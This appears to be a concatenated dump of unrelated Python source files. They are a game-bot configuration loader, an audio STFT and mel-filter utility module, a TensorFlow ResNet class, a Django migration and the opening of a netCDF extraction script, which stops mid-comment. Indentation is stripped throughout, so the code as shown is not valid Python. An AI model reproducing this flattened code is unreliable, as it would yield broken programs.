# through the codebase, so warnings are only printed when explicitly requested
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
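# Rough usage sketch (values depend on the ini files that are present):
#   config = Config()
#   char_type = config.char["type"]          # e.g. "sorceress"
#   hp_cols = config.char["belt_hp_columns"] # parsed as int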
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir('assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| 2.65625 | 3 |
aps/transform/utils.py | haoxiangsnr/aps | 2 | 4995 | # Copyright 2019 <NAME>
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
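# Rough usage sketch: a periodic Hann window for 25 ms frames at 16 kHz:
#   win = init_window("hann", 400)  # th.Tensor of shape (400,)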
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
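# The returned kernel K has shape (2B, 1, W): the first B output channels of
# a conv1d with this kernel give the real part of the DFT and the last B the
# imaginary part, with W = frame_len ("kaldi") or the padded FFT size B
# ("librosa"). For example, frame_len=400 with round_pow_of_two=True uses
# B = 512.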
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
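# Rough usage sketch: 80 mel bands for 16 kHz audio framed with 400-sample
# windows (FFT size 512 -> 257 frequency bins):
#   fbank = mel_filter(400, num_mels=80)  # th.Tensor of shape (80, 257)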
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
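# Rough usage sketch: a speed perturbation implemented as resampling from
# 16 kHz to 17.6 kHz; after dividing by gcd=1600 this builds a filter bank of
# shape (dst_sr, src_sr, 2*padding+1) = (11, 10, 15) with the defaults:
#   weight = speed_perturb_filter(16000, 17600)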
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
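# Rough usage sketch: splicing 2 left and 2 right context frames onto an
# N x T x F feature:
#   x = th.rand(4, 100, 80)
#   y = splice_feature(x, lctx=2, rctx=2, op="cat")    # shape (4, 100, 400)
#   z = splice_feature(x, lctx=2, rctx=2, op="stack")  # shape (4, 100, 80, 5)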
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
        input (str), input format:
            polar: (magnitude, phase) pair
            complex: (real, imag) pair
            real: stacked [real; imag] Tensor
        frame_hop: frame hop size in samples
        onesided: whether the input transform contains only the first half of the FFT bins
        center: must match the center flag used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
        mode: "kaldi"|"librosa", slight difference on applying window function
    Return:
        transform (Tensor or [Tensor, Tensor]), STFT transform results
    """
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
        onesided: whether the input transform is onesided (half FFT bins)
        mode: "kaldi"|"librosa", slight difference on applying window function
    Return:
        wav (Tensor), N x S, the reconstructed waveform
    """
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
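# Illustrative round-trip sketch (not part of the original module): applying
# forward_stft followed by inverse_stft should approximately reconstruct the
# input waveform. Frame length/hop below are arbitrary example settings.
def _stft_round_trip_example():
    # hypothetical helper, for illustration only
    wav = th.randn(1, 16000)
    transform = forward_stft(wav, 400, 160, output="complex", center=True)
    rec = inverse_stft(transform, 400, 160, input="complex", center=True)
    # lengths may differ by a few samples at the edges, so compare the overlap
    n = min(wav.shape[-1], rec.shape[-1])
    return th.mean((wav[..., :n] - rec[..., :n]) ** 2)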
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
pre_emphasis: factor of preemphasis
mode: "kaldi"|"librosa", slight difference on applying window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
Compute number of the frames
"""
        if th.any(wav_len <= self.frame_len):
raise RuntimeError(
f"Audio samples less than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
        Accept a (single or multi-channel) raw waveform and output the STFT in the requested format (magnitude & phase by default)
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
        Accept an STFT transform (magnitude & phase by default) and output the raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
| 2.046875 | 2 |
applications/tensorflow/cnns/models/resnet.py | xihuaiwen/chinese_bert | 0 | 4996 | <reponame>xihuaiwen/chinese_bert
# Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
class TensorflowResNet(ResNet):
def __init__(self, *args, **kwargs):
self.dtype = tf.float16
super(TensorflowResNet, self).__init__(*args, **kwargs)
def _get_variable(self, name, shape, init):
return tf.get_variable(name, shape, initializer=init, dtype=self.dtype)
def residual(self, x, shortcut, out_filters, stride, type='B'):
in_shape = shortcut.get_shape()
pad = int(x.get_shape()[3] - in_shape[3])
if pad != 0 or type == 'C':
if type == 'A':
shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape,
strides=[1, stride, stride, 1])
shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]])
else:
shortcut = self.conv(shortcut, 1, stride, out_filters)
shortcut = self.norm(shortcut)
x = shortcut + x
x = self.relu(x)
return x
def relu(self, x):
return tf.nn.relu(x)
def conv(self, x, ksize, stride, filters_out, bias=True):
filters_in = x.get_shape()[-1]
wshape = [ksize, ksize, filters_in, filters_out]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
weights = self._get_variable('weights', shape=wshape, init=w_init)
x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME')
if bias:
bshape = [filters_out]
b_init = tf.zeros_initializer()
biases = self._get_variable('biases', shape=bshape, init=b_init)
x = x + biases
return x
def norm(self, x, type='BATCH', groups=32, training=False):
if type == 'BATCH':
# Perhaps use tf.nn.fused_batch_norm instead.
x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True,
training=training, trainable=training,
momentum=0.997, epsilon=1e-5)
elif type == 'GROUP':
x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True,
training=training, trainable=training,
channels_axis=-1, reduction_axes=[-3, -2])
return x
def fc(self, x, num_units_out):
num_units_in = x.get_shape()[1]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
b_init = tf.constant_initializer(0.0)
with self.namescope('fc'):
weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init)
biases = self._get_variable('biases', shape=[num_units_out], init=b_init)
x = tf.nn.xw_plus_b(x, weights, biases)
return x
def reduce_mean(self, x, indices=(1, 2)):
x = tf.reduce_mean(x, reduction_indices=indices)
return x
def maxpool(self, x):
x = tf.nn.max_pool(
x,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='SAME')
return x
def namescope(self, debug_string):
return tf.variable_scope(debug_string)
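# Illustrative sketch (not part of the original file): the type-'A' shortcut in
# residual() above downsamples spatially with a strided slice and zero-pads the
# channel dimension instead of using a 1x1 projection. Shapes are example values.
def _type_a_shortcut_example():
    # hypothetical helper, for illustration only
    shortcut = tf.zeros((1, 8, 8, 16), dtype=tf.float16)      # N x H x W x C
    sliced = tf.strided_slice(shortcut, [0, 0, 0, 0], [1, 8, 8, 16],
                              strides=[1, 2, 2, 1])           # 1 x 4 x 4 x 16
    padded = tf.pad(sliced, paddings=[[0, 0], [0, 0], [0, 0], [0, 16]])
    return padded                                             # 1 x 4 x 4 x 32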
| 2.046875 | 2 |
backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0 | 4997 | <filename>backend/app/migrations/0021_auto_20201205_1846.py<gh_stars>0
# Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0020_auto_20201204_2324'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profileBankAccountNr',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='profile',
name='profileTelephoneNumber',
field=models.CharField(blank=True, max_length=15, null=True),
),
]
| 1.359375 | 1 |
rawcdf_extract.py | bedaro/ssm-analysis | 0 | 4998 | <reponame>bedaro/ssm-analysis<gh_stars>0
#!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
def get_node_ids(shps, masked):
merged = None
for i,shp in enumerate(shps):
df = gpd.read_file(shp)
df.set_index('node_id', inplace=True)
logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df)))
if merged is None:
merged = df.index
else:
merged = merged.union(df.index)
logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format(
len(merged), len(shps)))
masked_nodes = np.loadtxt(masked)
merged = merged.difference(masked_nodes)
logger.debug("{0} nodes left after masking".format(len(merged)))
return merged.to_numpy()
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
def init_output(output_cdf, indata, nodes, **kwargs):
args = Namespace(**kwargs)
output = Dataset(output_cdf, "w")
timeDim = output.createDimension('time', len(indata.dimensions['time']))
nodeDim = output.createDimension('node', len(nodes))
nodeVar = output.createVariable('node', "i4", ('node',))
output['node'][:] = nodes
timeVar = output.createVariable('time', "f4", ('time',))
# Iterate over all output variables
# If an extraction attribute is "all":
# - add the 'siglay' dimension to the output if it's not already present
# - include the 'siglay' dimension on the output variable
# - add a 'zeta' output variable
for var, attr in args.input_vars:
if attr == InputAttr.ALL:
siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS
output.createDimension('siglay', len(siglayers))
output.createVariable('siglay', 'f4', ('siglay',))
output['siglay'][:] = siglayers
if 'zeta' in indata.variables:
output.createVariable('zeta', 'f4', ('time','node'))
break
return output
def append_output(output_cdf):
return Dataset(output_cdf, 'a')
def init_output_vars(output, **kwargs):
args = Namespace(**kwargs)
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.BOTTOM:
out_name += "_bottom"
# TODO handle photic case
dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node')
output.createVariable(out_name, 'f4', dims)
# Adapted from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i+n]
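# Illustrative note (not part of the original script): chunks() groups the
# input CDF paths for blockwise processing, e.g.
#   list(chunks(["a.nc", "b.nc", "c.nc"], 2)) -> [["a.nc", "b.nc"], ["c.nc"]]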
class InputAttr(Enum):
ALL = 0
BOTTOM = 1
# TODO add "photic" for the photic zone
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
def colon_meta(string):
var, attr = string.split(':', 2)
return (var, attr_strings[attr])
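# Illustrative note (not part of the original script): the --invar flag is
# parsed by colon_meta, e.g. colon_meta("DOXG:bottom") returns
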